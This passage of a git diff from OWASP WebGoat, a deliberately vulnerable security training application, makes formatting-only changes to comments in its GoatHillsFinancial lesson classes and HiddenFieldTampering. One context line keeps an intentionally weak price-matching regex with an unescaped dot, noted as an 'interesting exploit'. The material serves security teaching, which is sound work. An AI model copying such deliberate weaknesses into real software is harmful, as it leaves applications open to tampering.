a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java @@ -95,8 +95,8 @@ public class EditProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java index f2384907f..443829279 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java @@ -69,11 +69,11 @@ public class FindProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } @@ -139,8 +139,8 @@ public class FindProfile extends DefaultLessonAction .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */ setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id)); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java index 4210cc839..0a006fec0 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java @@ -220,29 +220,29 @@ public class GoatHillsFinancial extends RandomLessonAdapter } } catch (ParameterNotFoundException pnfe) { - //System.out.println("Missing parameter"); + // System.out.println("Missing parameter"); pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (ValidationException ve) { - //System.out.println("Validation failed"); + // System.out.println("Validation failed"); ve.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (UnauthenticatedException ue) { s.setMessage("Login failed"); - //System.out.println("Authentication failure"); + // System.out.println("Authentication failure"); ue.printStackTrace(); } catch (UnauthorizedException ue2) { s.setMessage("You are not authorized to perform this function"); - //System.out.println("Authorization failure"); + // System.out.println("Authorization failure"); setCurrentAction(s, ERROR_ACTION); ue2.printStackTrace(); } catch (Exception e) { // All other errors send the user to the generic error page - //System.out.println("handleRequest() error"); + // System.out.println("handleRequest() error"); e.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java index 2eb89d8dc..76ade85d5 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java @@ -75,11 +75,11 @@ public class Login extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java index 7d877a902..cd20d6665 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java @@ -58,11 +58,11 @@ public class Logout extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java index 740f68722..3760aa5f1 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java @@ -94,11 +94,11 @@ public class UpdateProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java index 9a79405db..d217f5f43 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java @@ -104,8 +104,8 @@ public class ViewProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java index a938c9b40..10ebb255a 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java @@ -68,7 +68,7 @@ public class HiddenFieldTampering extends LessonAdapter private final static String PRICE_TV_HACKED = "9.99"; String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any - // interesting exploit! + // interesting exploit! Pattern pattern1 = Pattern.compile(regex); String lineSep = System.getProperty("line.separator"); String script = "